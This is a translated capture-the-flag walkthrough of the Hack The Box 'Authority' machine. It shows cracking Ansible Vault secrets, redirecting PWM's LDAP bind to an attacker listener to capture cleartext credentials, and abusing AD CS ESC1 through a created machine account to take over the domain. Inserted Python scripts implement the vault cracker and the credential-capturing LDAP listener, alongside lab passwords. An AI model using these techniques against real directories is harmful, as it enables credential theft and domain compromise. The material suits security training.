HTB Authority

Posted 2025/3/16 21:36:49. Source: https://www.cnblogs.com/v3n0m-cccccc/p/18775744

Port scan
nmap -sC -sV -p- -Pn -T4 10.10.11.222
Starting Nmap 7.92 ( https://nmap.org ) at 2024-10-04 19:42 CST
Nmap scan report for 10.10.11.222 (10.10.11.222)
Host is up (0.40s latency).
Not shown: 65506 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-04 15:44:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:22+00:00; +3h59m59s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:21+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:22+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: authority.htb, Site: Default-First-Site-Name)
|_ssl-date: 2024-10-04T15:45:21+00:00; +4h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: othername:, DNS:authority.htb.corp, DNS:htb.corp, DNS:HTB
| Not valid before: 2022-08-09T23:03:21
|_Not valid after: 2024-08-09T23:13:21
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8443/tcp open ssl/https-alt
|_http-title: Site doesn't have a title (text/html;charset=ISO-8859-1).
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Fri, 04 Oct 2024 15:44:13 GMT
| Connection: close
|
| GetRequest:
| HTTP/1.1 200
| Content-Type: text/html;charset=ISO-8859-1
| Content-Length: 82
| Date: Fri, 04 Oct 2024 15:44:08 GMT
| Connection: close
|
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, OPTIONS
| Content-Length: 0
| Date: Fri, 04 Oct 2024 15:44:11 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1936
| Date: Fri, 04 Oct 2024 15:44:22 GMT
| Connection: close
| <!doctype html>HTTP Status 400 – Bad Request
| Type Exception Report
| Message Invalid character found in the HTTP protocol [RTSP/1.00x0d0x0a0x0d0x0a...]
| Description The server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=172.16.2.118
| Not valid before: 2024-10-02T14:55:01
|_Not valid after: 2026-10-05T02:33:25
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49690/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49691/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
49703/tcp open msrpc Microsoft Windows RPC
49714/tcp open msrpc Microsoft Windows RPC
51685/tcp open msrpc Microsoft Windows RPC
51731/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8443-TCP:V=7.92%T=SSL%I=7%D=10/4%Time=66FFD509%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,DB,"HTTP/1.1\x20200\x20\r\nContent-Type:\x20text/html;c
SF:harset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Fri,\x2004\x20Oc
SF:t\x202024\x2015:44:08\x20GMT\r\nConnection:\x20close\r\n\r\n\n\n\n\n\n<
SF:html><meta\x20http-equiv="refresh"\x20content="0;URL='/pwm'"/
SF:>")%r(HTTPOptions,7D,"HTTP/1.1\x20200\x20\r\nAllow:\x20G
SF:ET,\x20HEAD,\x20POST,\x20OPTIONS\r\nContent-Length:\x200\r\nDate:\x20Fr
SF:i,\x2004\x20Oct\x202024\x2015:44:11\x20GMT\r\nConnection:\x20close\r\n
SF:r\n")%r(FourOhFourRequest,DB,"HTTP/1.1\x20200\x20\r\nContent-Type:\x20
SF:text/html;charset=ISO-8859-1\r\nContent-Length:\x2082\r\nDate:\x20Fri,
SF:x2004\x20Oct\x202024\x2015:44:13\x20GMT\r\nConnection:\x20close\r\n\r\n
SF:\n\n\n\n\n<meta\x20http-equiv="refresh"\x20content="0;UR
SF:L='/pwm'"/>")%r(RTSPRequest,82C,"HTTP/1.1\x20400\x20\r
SF:nContent-Type:\x20text/html;charset=utf-8\r\nContent-Language:\x20en\r
SF:nContent-Length:\x201936\r\nDate:\x20Fri,\x2004\x20Oct\x202024\x2015:44
SF::22\x20GMT\r\nConnection:\x20close\r\n\r\n<!doctype\x20html><html\x20la
SF:ng="en">HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:<style\x20type="text/css">body\x20{font-family:Tahoma,
SF:Arial,sans-serif;}\x20h1,\x20h2,\x20h3,\x20b\x20{color:white;background
SF:-color:#525D76;}\x20h1\x20{font-size:22px;}\x20h2\x20{font-size:16px;}
SF:\x20h3\x20{font-size:14px;}\x20p\x20{font-size:12px;}\x20a\x20{color:bla
SF:ck;}\x20.line\x20{height:1px;background-color:#525D76;border:none;}</s
SF:tyle>HTTP\x20Status\x20400\x20\xe2\x80\x93\x20Bad\x20Request
SF:<hr\x20class="line"\x20/>Type\x20Exception\x20Report
SF:Message\x20Invalid\x20character\x20found\x20in\x20the
SF:\x20HTTP\x20protocol\x20[RTSP/1.00x0d0x0a0x0d0x0a...]<
SF:b>Description\x20The\x20server\x20cannot\x20or\x20will\x20not\x20pr
SF:ocess\x20the\x20request\x20due\x20to\x20something\x20that\x20is\x20perc
SF:eived\x20to\x20be\x20a\x20client\x20error\x20(e.g.,\x20malformed\x20
SF:request\x20syntax,\x20invalid\x20");
Service Info: Host: AUTHORITY; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-10-04T15:45:09
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: mean: 3h59m59s, deviation: 0s, median: 3h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 172.77 seconds
Many services are exposed, so start with information gathering. Note the clock skew nmap reports (about 4 hours): Kerberos rejects requests outside a 5-minute window, so any Kerberos-based step later (certipy auth, for example) needs the attacker's clock aligned with the DC, e.g. with ntpdate or faketime.
On 445 it quickly turns out that anonymous (null-session) access to the shares is allowed.

Listing the Development share, there is a folder inside.

Probing 8443 shows a PWM instance; the service fingerprint above already hinted at it (/ redirects to /pwm, and the 400 page is Tomcat's, PWM being a Java web application).
PWM is an open-source password self-service web application for LDAP directories, Active Directory included. Its main functions are:
Password self-service
: users change their own password, recover a forgotten one through challenge questions or e-mail/SMS tokens, and activate or unlock their accounts.
Helpdesk module
: delegated operators can reset passwords and unlock accounts for other users.
LDAP integration
: PWM binds to the directory with a proxy (service) account whose DN and password are stored in its configuration, over ldap:// or ldaps:// as configured.
Browser-based configuration
: a Configuration Manager/Editor, unlocked with a separate configuration password rather than a directory account, exposes every setting including the LDAP profiles and offers a "Test LDAP Profile" action that performs a live bind with the stored credentials.
The last two points are what make the application interesting here: whoever controls the configuration controls where, and how, that service account authenticates.

Going through the share, the PWM Ansible material contains credentials stored encrypted with Ansible Vault:

pwm_admin_login: !vault |
    $ANSIBLE_VAULT;1.1;AES256
    32666534386435366537653136663731633138616264323230383566333966346662313161326239
    6134353663663462373265633832356663356239383039640a346431373431666433343434366139
    35653634376333666234613466396534343030656165396464323564373334616262613439343033
    6334326263326364380a653034313733326639323433626130343834663538326439636232306531
    3438

pwm_admin_password: !vault |
    $ANSIBLE_VAULT;1.1;AES256
    31356338343963323063373435363261323563393235633365356134616261666433393263373736
    3335616263326464633832376261306131303337653964350a363663623132353136346631396662
    38656432323830393339336231373637303535613636646561653637386634613862316638353530
    3930356637306461350a316466663037303037653761323565343338653934646533663365363035
    6531

ldap_uri: ldap://127.0.0.1/
ldap_base_dn: "DC=authority,DC=htb"
ldap_admin_password: !vault |
    $ANSIBLE_VAULT;1.1;AES256
    63303831303534303266356462373731393561313363313038376166336536666232626461653630
    3437333035366235613437373733316635313530326639330a643034623530623439616136363563
    34646237336164356438383034623462323531316333623135383134656263663266653938333334
    3238343230333633350a646664396565633037333431626163306531336336326665316430613566
    3764

Jumping ahead to the result of the cracking described next: all three vaults use the vault password !@#$%^&*, and they decrypt to svc_pwm (pwm_admin_login), pWm_@dm!N_!23 (pwm_admin_password) and DevT3st@123 (ldap_admin_password).

These are Ansible Vault secrets (format 1.1, AES256), so the vault password can be brute-forced offline with john.
Save the ciphertext of one entry, from the $ANSIBLE_VAULT;1.1;AES256 header line through the last hex line, in a file called hash, convert it to john's format and run it against rockyou:
ansible2john hash > hash.1
john hash.1 --wordlist=/usr/share/wordlists/rockyou.txt

The vault password is !@#$%^&*.
All three blobs turn out to use the same vault password, so the other two need no separate cracking.
Decrypt each one in turn (ansible-vault prompts for the vault password; ansible-vault view works too and leaves the file untouched):
ansible-vault decrypt <ciphertext file>
The plaintexts are:
svc_pwm
pWm_@dm!N_!23
DevT3st@123
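As an added example (not from the original post and not code from the john or Ansible projects), the following Python reproduces what ansible2john and john actually do with a vault blob: parse the $ANSIBLE_VAULT;1.1;AES256 envelope, derive the key material with PBKDF2-HMAC-SHA256 (10,000 rounds, 80 bytes: AES-256 key, HMAC key, AES-CTR IV), and test a candidate vault password by recomputing the HMAC-SHA256 over the ciphertext. No AES decryption is needed to verify a guess, which is why the check is cheap. Standard library only. The self-test builds a vault blob around a constructed, not really encrypted, ciphertext (only the salt/HMAC layout matters for the check); the pwm_admin_login blob is copied from the share listing above and is tried against a small wordlist.

```python
import binascii
import hashlib
import hmac
import os
import textwrap

VAULT_HEADER = "$ANSIBLE_VAULT;1.1;AES256"
PBKDF2_ROUNDS = 10000  # fixed in Ansible's VaultAES256 implementation


def parse_vault(text):
    """Split a 1.1/AES256 vault blob into (salt, stored_hmac, ciphertext) bytes.

    The body is hex; decoded, it is 'salt_hex\\nhmac_hex\\nciphertext_hex'.
    """
    lines = [ln.strip() for ln in text.strip().splitlines() if ln.strip()]
    if lines[0] != VAULT_HEADER:
        raise ValueError("unsupported vault header: %r" % lines[0])
    payload = binascii.unhexlify("".join(lines[1:]))
    salt_hex, hmac_hex, ct_hex = payload.split(b"\n")
    return (binascii.unhexlify(salt_hex),
            binascii.unhexlify(hmac_hex),
            binascii.unhexlify(ct_hex))


def derive_keys(password, salt):
    """PBKDF2-HMAC-SHA256 -> 80 bytes = AES-256 key | HMAC key | AES-CTR IV."""
    km = hashlib.pbkdf2_hmac("sha256", password.encode(), salt,
                             PBKDF2_ROUNDS, dklen=80)
    return km[:32], km[32:64], km[64:80]


def check_password(vault_text, password):
    """True if `password` reproduces the stored HMAC over the ciphertext.

    This is the test john performs on an ansible2john hash: a wrong password
    yields a different HMAC key, so no decryption is attempted at all.
    """
    salt, stored_mac, ciphertext = parse_vault(vault_text)
    _aes_key, hmac_key, _iv = derive_keys(password, salt)
    calc = hmac.new(hmac_key, ciphertext, hashlib.sha256).digest()
    return hmac.compare_digest(calc, stored_mac)


def crack(vault_text, wordlist):
    """Return the first candidate that verifies, or None."""
    for candidate in wordlist:
        if check_password(vault_text, candidate):
            return candidate
    return None


def make_test_vault(password, ciphertext):
    """Constructed test fixture: a well-formed vault blob whose salt and HMAC
    are computed the way Ansible does, around an arbitrary 'ciphertext'.
    It is NOT a real AES-CTR encryption (ansible-vault could not decrypt it),
    but the password check above depends only on salt + HMAC."""
    salt = os.urandom(32)
    _aes_key, hmac_key, _iv = derive_keys(password, salt)
    mac_hex = hmac.new(hmac_key, ciphertext, hashlib.sha256).hexdigest()
    payload = b"\n".join([binascii.hexlify(salt), mac_hex.encode(),
                          binascii.hexlify(ciphertext)])
    body = binascii.hexlify(payload).decode()
    return VAULT_HEADER + "\n" + "\n".join(textwrap.wrap(body, 80)) + "\n"


# pwm_admin_login blob as listed in the share above (copied from the post).
PWM_ADMIN_LOGIN_VAULT = """$ANSIBLE_VAULT;1.1;AES256
32666534386435366537653136663731633138616264323230383566333966346662313161326239
6134353663663462373265633832356663356239383039640a346431373431666433343434366139
35653634376333666234613466396534343030656165396464323564373334616262613439343033
6334326263326364380a653034313733326639323433626130343834663538326439636232306531
3438
"""

if __name__ == "__main__":
    small_wordlist = ["password", "123456", "admin", "!@#$%^&*"]
    print("constructed blob ->",
          crack(make_test_vault("!@#$%^&*", os.urandom(16)), small_wordlist))
    print("pwm_admin_login  ->", crack(PWM_ADMIN_LOGIN_VAULT, small_wordlist))
```

Because every candidate costs one PBKDF2 run of 10,000 rounds, throughput is bounded by the KDF, not by AES; john's ansible format is GPU-accelerated for the same reason. The same observation cuts the other way for defenders: a vault password from a common wordlist, as here, falls in seconds regardless of how strong the secrets inside the vault are.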
At this point it is not known which accounts these passwords belong to, so look at what the PWM back end offers.

The PWM configuration login only asks for a password; there is no username field.

Try the recovered passwords: pWm_@dm!N_!23 logs in successfully.

Open the Configuration Editor.

It exposes the LDAP profile, including the URL of the directory server PWM binds to. Replace it with the attacker machine's address (plain ldap://<tun0 IP>, not ldaps) and start Responder on the attacking host before clicking "Test LDAP Profile":
responder -I tun0

PWM binds to the new URL with its stored service-account credentials. Because the connection is plain ldap://, the simple bind carries the DN and password in cleartext, and Responder logs them: svc_ldap:lDaP_1n_th3_cle4r!
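To make explicit why this capture works, here is an added Python example (not from the post and not Responder's code) that does the core of what Responder's LDAP listener does: decode the BER-encoded LDAP BindRequest a client sends for a simple bind and extract the DN and cleartext password. The sample packet is constructed with the credentials captured above; the DN layout is an assumption. A simple bind is only protected when the connection itself is encrypted (ldaps:// or StartTLS), which is exactly what pointing the profile at ldap:// drops.

```python
import socket

# BER tags for an LDAP simple BindRequest (RFC 4511 section 4.2).
TAG_SEQUENCE = 0x30       # LDAPMessage envelope
TAG_INTEGER = 0x02        # messageID, version
TAG_OCTET_STRING = 0x04   # name (bind DN)
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0] constructed
TAG_SIMPLE_AUTH = 0x80    # authentication CHOICE: simple [0] OCTET STRING


def _ber_len(n):
    """BER length: short form below 128, else 0x8N followed by N length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _ber_int(n):
    """Minimal big-endian encoding of a non-negative INTEGER (sign bit kept 0)."""
    return n.to_bytes((n.bit_length() + 8) // 8, "big")


def _tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def build_simple_bind(message_id, dn, password, version=3):
    """Encode the BindRequest an LDAP client sends for a simple bind. Used here
    only to construct a sample of the traffic PWM emits on 'Test LDAP Profile'."""
    op = _tlv(TAG_BIND_REQUEST,
              _tlv(TAG_INTEGER, _ber_int(version))
              + _tlv(TAG_OCTET_STRING, dn.encode())
              + _tlv(TAG_SIMPLE_AUTH, password.encode()))
    return _tlv(TAG_SEQUENCE, _tlv(TAG_INTEGER, _ber_int(message_id)) + op)


def _read_tlv(buf, pos):
    """Decode one TLV at `pos`; returns (tag, value, position after it)."""
    if pos + 2 > len(buf):
        raise ValueError("truncated BER element")
    tag, first = buf[pos], buf[pos + 1]
    pos += 2
    if first & 0x80:
        n = first & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    else:
        length = first
    if pos + length > len(buf):
        raise ValueError("truncated BER element")
    return tag, buf[pos:pos + length], pos + length


def parse_simple_bind(packet):
    """Return {'message_id','version','dn','password'} for a simple BindRequest,
    or None when the message is something else (unbind, SASL bind, ...)."""
    tag, msg, _ = _read_tlv(packet, 0)
    if tag != TAG_SEQUENCE:
        return None
    _, mid, pos = _read_tlv(msg, 0)
    tag, op, _ = _read_tlv(msg, pos)
    if tag != TAG_BIND_REQUEST:
        return None
    _, ver, pos = _read_tlv(op, 0)
    _, name, pos = _read_tlv(op, pos)
    auth_tag, auth, _ = _read_tlv(op, pos)
    if auth_tag != TAG_SIMPLE_AUTH:
        return None  # SASL (GSSAPI/NTLM) binds carry no cleartext password
    return {"message_id": int.from_bytes(mid, "big"),
            "version": int.from_bytes(ver, "big"),
            "dn": name.decode("utf-8", errors="replace"),
            "password": auth.decode("utf-8", errors="replace")}


def listen_once(bind_addr="0.0.0.0", port=389):
    """Accept one connection on the LDAP port and parse its first message
    (the part Responder automates; binding to 389 needs root)."""
    with socket.socket() as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()
        with conn:
            data = conn.recv(4096)
    return peer, parse_simple_bind(data)


if __name__ == "__main__":
    # Constructed sample: the DN layout is an assumption, the values are the
    # credentials Responder captured above.
    sample = build_simple_bind(1, "CN=svc_ldap,CN=Users,DC=authority,DC=htb",
                               "lDaP_1n_th3_cle4r!")
    print(sample.hex())
    print(parse_simple_bind(sample))
```

The listener never has to answer: the credentials are in the very first message the client sends, before any server response. That is also why the defensive control belongs on the client side, by requiring LDAPS (or LDAP signing/channel binding, which forces SASL) in the application's profile rather than trusting whoever can edit the URL.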
Log in over WinRM (5985 is open) with evil-winrm as svc_ldap.

This gives the user flag.
Next, privilege escalation. Check the account's privileges and group memberships:
whoami /all

svc_ldap is a member of a certificate-services group, which points at AD CS.
Look for AD CS escalation paths by enumerating vulnerable templates with certipy:
certipy-ad find -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -vulnerable -stdout -dc-ip 10.10.11.222

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 37 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Trying to get CA configuration for 'AUTHORITY-CA' via CSRA
[!] Got error while trying to get CA configuration for 'AUTHORITY-CA' via CSRA: CASessionError: code: 0x80070005 - E_ACCESSDENIED - General access denied error.
[*] Trying to get CA configuration for 'AUTHORITY-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Got CA configuration for 'AUTHORITY-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : AUTHORITY-CA
DNS Name : authority.authority.htb
Certificate Subject : CN=AUTHORITY-CA, DC=authority, DC=htb
Certificate Serial Number : 2C4E1F3CA46BBDAF42A1DDE3EC33A6B4
Certificate Validity Start : 2023-04-24 01:46:26+00:00
Certificate Validity End : 2123-04-24 01:56:25+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : AUTHORITY.HTB\Administrators
Access Rights
ManageCertificates : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
ManageCa : AUTHORITY.HTB\Administrators
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Enroll : AUTHORITY.HTB\Authenticated Users
Certificate Templates
0
Template Name : CorpVPN
Display Name : Corp VPN
Certificate Authorities : AUTHORITY-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : AutoEnrollmentCheckUserDsCertificate
PublishToDs
IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Document Signing
IP security IKE intermediate
IP security use
KDC Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 20 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Enrollment Permissions
Enrollment Rights : AUTHORITY.HTB\Domain Computers
AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
Object Control Permissions
Owner : AUTHORITY.HTB\Administrator
Write Owner Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Dacl Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
Write Property Principals : AUTHORITY.HTB\Domain Admins
AUTHORITY.HTB\Enterprise Admins
AUTHORITY.HTB\Administrator
[!] Vulnerabilities
ESC1 : 'AUTHORITY.HTB\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication

So the CorpVPN template is vulnerable to ESC1: the enrollee supplies the subject (an arbitrary UPN can be placed in the SAN), the template allows client authentication, neither manager approval nor authorized signatures are required, and a low-privileged group (Domain Computers) can enroll.
Exploit it.
Request a certificate for the Administrator account:
certipy-ad req -u svc_ldap -p 'lDaP_1n_th3_cle4r!' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -debug

This fails with: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
The cause is visible in the certipy output: enrollment rights on CorpVPN are granted to Domain Computers (plus the admin groups), not to Authenticated Users or Domain Users, so svc_ldap itself cannot enroll. A computer account, however, is automatically a member of Domain Computers, and by default ms-DS-MachineAccountQuota allows any authenticated user to create up to 10 computer accounts in the domain. The request therefore has to come from a machine account; https://github.com/ly4k/Certipy/issues/199 discusses the same situation.
Add a computer account (any authenticated user can do this while the quota is not exhausted):
impacket-addcomputer 'authority.htb/svc_ldap:lDaP_1n_th3_cle4r!' -computer-name test -computer-pass 123456 -dc-ip 10.10.11.222 -debug
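The decision just made, formalized as an added Python example (not from the post and not certipy's code): evaluate the ESC1 preconditions from the template's raw AD attributes and work out whether svc_ldap can enroll directly or has to go through a machine account. The template values are transcribed from the certipy output above; the EKU OIDs are the standard OIDs for the EKU names certipy printed, only the enrollment-flag bit relevant to the check is modelled, and the group list for svc_ldap and the MachineAccountQuota of 10 (the domain default) are assumptions.

```python
# Attribute constants from the AD CS template schema (MS-CRTD); fixed values.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval
CT_FLAG_PUBLISH_TO_DS = 0x00000008              # msPKI-Enrollment-Flag

# EKU OIDs that let a certificate authenticate as the identity in its SAN.
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_ANY_PURPOSE = "2.5.29.37.0"
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_PKINIT_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_ANY_PURPOSE}

# Groups that effectively mean "any domain principal" for enrollment purposes.
LOW_PRIV_PRINCIPALS = {"Authenticated Users", "Domain Users", "Domain Computers", "Everyone"}


def esc1_checks(template):
    """Evaluate each ESC1 precondition on a template's raw attributes."""
    ekus = set(template["pKIExtendedKeyUsage"])
    return {
        "enrollee_supplies_subject":
            bool(template["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "no_manager_approval":
            not (template["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS),
        "no_signatures_required": template["msPKI-RA-Signature"] == 0,
        # An empty EKU list means the certificate is good for any purpose.
        "auth_eku": (not ekus) or bool(ekus & AUTH_EKUS),
        "low_priv_can_enroll": bool(set(template["enroll"]) & LOW_PRIV_PRINCIPALS),
    }


def is_esc1(template):
    return all(esc1_checks(template).values())


def enrollment_path(template, my_groups, machine_account_quota):
    """How a principal in `my_groups` reaches an identity with Enroll rights.

    'direct'          - one of the caller's groups holds Enroll
    'machine_account' - only Domain Computers can enroll, but MAQ > 0 lets the
                        caller create a computer account, which is a member
    None              - no route (this is where CERTSRV_E_TEMPLATE_DENIED ends)
    """
    enrollers = set(template["enroll"])
    if enrollers & set(my_groups):
        return "direct"
    if "Domain Computers" in enrollers and machine_account_quota > 0:
        return "machine_account"
    return None


# CorpVPN as transcribed from the certipy output above.
CORP_VPN = {
    "name": "CorpVPN",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": CT_FLAG_PUBLISH_TO_DS,  # other listed flags are irrelevant to ESC1
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": [
        "1.3.6.1.4.1.311.10.3.4",   # Encrypting File System
        "1.3.6.1.5.5.7.3.4",        # Secure Email
        EKU_CLIENT_AUTH,            # Client Authentication
        "1.3.6.1.4.1.311.10.3.12",  # Document Signing
        "1.3.6.1.5.2.3.5",          # KDC Authentication
    ],
    "enroll": ["Domain Computers", "Domain Admins", "Enterprise Admins"],
}

# Assumed for svc_ldap: an ordinary domain user, and the default quota of 10.
SVC_LDAP_GROUPS = {"Authenticated Users", "Domain Users"}
DEFAULT_MACHINE_ACCOUNT_QUOTA = 10

if __name__ == "__main__":
    for check, ok in esc1_checks(CORP_VPN).items():
        print("%-28s %s" % (check, ok))
    print("ESC1:", is_esc1(CORP_VPN))
    print("path for svc_ldap:",
          enrollment_path(CORP_VPN, SVC_LDAP_GROUPS, DEFAULT_MACHINE_ACCOUNT_QUOTA))
```

Two of the inputs are what a defender would change: clearing CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT (or enabling manager approval) removes the ESC1 condition outright, and setting ms-DS-MachineAccountQuota to 0 closes the machine-account route for templates that grant Enroll to Domain Computers only.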

Request the Administrator certificate as the new machine account:
certipy-ad req -u 'test$' -p '123456' -ca AUTHORITY-CA -dc-ip 10.10.11.222 -template CorpVPN -upn administrator@authority.htb -debug

Use the certificate to authenticate and obtain the Administrator hash:
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.222

This fails too:
Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)
The KDC is rejecting the pre-authentication data type that PKINIT uses. That happens when the domain controller has no certificate of its own suitable for Kerberos authentication, so it cannot do PKINIT at all; certificate-based TGT requests, and with them the NT hash retrieval, are not possible against this DC.
The certificate is still valid for client authentication, though, and the same identity can be asserted over LDAPS via Schannel, which certipy exposes as an LDAP shell. The details are explained in
https://sensepost.com/blog/2025/diving-into-ad-cs-exploring-some-common-error-messages/

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.222 -ldap-shell

The LDAP shell runs as Administrator and can change group memberships; add svc_ldap to the Administrators group.

Reconnect as svc_ldap. The new membership is in the fresh logon token, so the account is now an administrator on the domain controller and the root flag can be read.

